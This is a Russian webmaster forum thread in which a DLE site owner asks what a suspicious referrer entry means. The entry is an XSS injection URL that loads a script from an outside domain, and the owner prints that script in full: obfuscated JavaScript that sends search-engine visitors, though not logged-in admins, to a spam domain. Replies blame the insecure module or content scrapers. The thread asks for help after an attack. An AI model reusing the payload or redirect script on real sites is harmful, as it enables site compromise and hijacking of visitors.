X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> И снова DLE, Взлом или что-то другое?
elvis81
elvis81
Topic Starter сообщение 29.9.2011, 21:54; Ответить: elvis81
Сообщение #1


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Доброго времени суток, уважаемые форумчане.

Поднимаю вопрос потому как сам вообще не разбираюсь в програмировании и хотел бы спросить у людей знающих.

У меня есть сайт, не так давно я так же как и все DLEшники боролся с взломом и закрывал дыры движка.
Но вот опять твориться что-то странное.
В модуле "переходы" появляется переход с гугла но с сылкой вот такого вида
_http://сайт/%3E%3C/a%3E%3Cscript%20src=http://vgoru.net/l.js%3E%3C/script%3E%3Ca%20href=


Я конечно же перешёл, для того чтобы посмотреть что там такое но переходил напрямую http://vgoru.net/l.js
И увидел там вот такой код:
if (dle_login_hash=="" || dle_admin==""){
function i( string ){var ret='',i = 0;for ( i = string.length-1;i>=0;i--){ret+=string.charAt(i);}return ret;}function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.all-lots-many.ru/%27+%27%3Fwkey%3D"+l(i('dce54'))+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}}



То что я там увидел мне не очень понравилось, хотя я и непонял что это такое.

Вопрос: Что же это такое? И как оно может повредить (если повредит)?

PS: Если тему уже поднимали, то не пинайте сильно, а просто укажите ссылк на тему. Если нет то пожалуйста поясните чем это чревато?

Да забыл сказать что переходы выполняются с IP адреса очень странного вида "74.125.77.147..."

Сообщение отредактировал elvis81 - 29.9.2011, 21:57


--------------------
ТИц поднимают, поднималкой для ТИца
2
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 29.9.2011, 22:01; Ответить: taxi2008
Сообщение #2


Оптимизатор
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Поблагодарили: 470 раз
Репутация:   114  


По поводу модуля - по ней очень часто задают вопросы подобного типа. Не только на данном форуме, но и на других. А вывод везде один - модуль нафиг ненужен. Уже 100 раз обсуждалось, что данный модуль дыревый до слез.. Тем не менее, многие игнорируют и ставят данный модуль, а потом идут на форум и жалуються что их взломали..
Советую бросить возиться с данным модулем.. Да и выглядит, лично по-моему мнению, просто отвратительно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 29.9.2011, 22:05; Ответить: elvis81
Сообщение #3


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Полагаю что каким то образом данный скрипт заставляет робота гугле посещать мой сайт с принудительно указанными параметрами. Разве такое возможно?
Потому что IP адрес гугла. После удаления всех переходов, какое-то время такого не наблюдается, но позже обязательно это происходит снова.

taxi2008, Вынужден с вами не согласиться.
Модуль позволяет наблюдать за статистикой сайта. Я могу просто не выводить его на странице или просто убрать у модуля отображение страницы на которую попали сделав переход. Меня интересует чем опасны такие переходы. И неужели "недоброжелатели" смогли заставить спамить саму поисковую систему?

Сообщение отредактировал elvis81 - 29.9.2011, 22:07


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 29.9.2011, 22:29; Ответить: Belos
Сообщение #4


Старожил
******

Группа: Active User
Сообщений: 2468
Регистрация: 11.11.2008
Из: Украина
Поблагодарили: 695 раз
Репутация:   96  


(elvis81 @ 29.9.2011, 21:05) *
Модуль позволяет наблюдать за статистикой сайта.


Для мониторинга ест намного лучше сервисы, то же LI!!!

По теме, соглашусь с taxi2008, модуль не нужный
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 29.9.2011, 22:35; Ответить: elvis81
Сообщение #5


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Belos, Вы не по теме. И согласились с taxi2008 тоже не по теме.
Тема совсем не касается нужно ставить модуль или нет. Тема касается анализа.
Вы просто флудите. По теме нужно написать что вы думаете по коду приведённому выше. Не можете написать что-то существенное, не пишите ничего.


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ФримаН
ФримаН
сообщение 29.9.2011, 23:44; Ответить: ФримаН
Сообщение #6


icq: 778367
*****

Группа: Active User
Сообщений: 773
Регистрация: 28.6.2010
Поблагодарили: 109 раз
Репутация:   44  


У меня были такие переходы. при чем не один и 10-20 в час. я не понимал нафига это надо пока не дошло что это роботы которые парсят твой контент.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
lamov
lamov
сообщение 29.9.2011, 23:48; Ответить: lamov
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 270
Регистрация: 6.7.2011
Из: Киев
Поблагодарили: 34 раза
Репутация:   2  


Какая версия модуля?
была такая проблема давно, когда перешел на более новую версию, а там была такая дырка, пришлось вернуться назад


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ФримаН
ФримаН
сообщение 29.9.2011, 23:54; Ответить: ФримаН
Сообщение #8


icq: 778367
*****

Группа: Active User
Сообщений: 773
Регистрация: 28.6.2010
Поблагодарили: 109 раз
Репутация:   44  


(lamov @ 29.9.2011, 22:48) *
Какая версия модуля?

неважно. это не от модуля зависит это просто роботы воруют твои новости через дорогие грабберы.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
lamov
lamov
сообщение 30.9.2011, 1:53; Ответить: lamov
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 270
Регистрация: 6.7.2011
Из: Киев
Поблагодарили: 34 раза
Репутация:   2  


перейти
вот тема была поднята по этому поводу


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ФримаН
ФримаН
сообщение 30.9.2011, 8:26; Ответить: ФримаН
Сообщение #10


icq: 778367
*****

Группа: Active User
Сообщений: 773
Регистрация: 28.6.2010
Поблагодарили: 109 раз
Репутация:   44  


(lamov @ 30.9.2011, 0:53) *
вот тема была поднята по этому поводу

lamov, а ну да может и это а может и парсер)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102734 Вчера, 10:55
автор: kukla
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1151 13.12.2017, 23:36
автор: Nell
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
142 contex1 65142 5.12.2017, 12:13
автор: contex1
Открытая тема (нет новых ответов) Требуется так сказать оптимизация шаблона DLE
5 Deadman_n 413 2.12.2017, 13:24
автор: Deadman_n
Открытая тема (нет новых ответов) Перенос сайта с DLE на WordPress
3 mdobyshev 871 30.11.2017, 7:29
автор: Nell


 



RSS Текстовая версия Сейчас: 15.12.2017, 22:13
Дизайн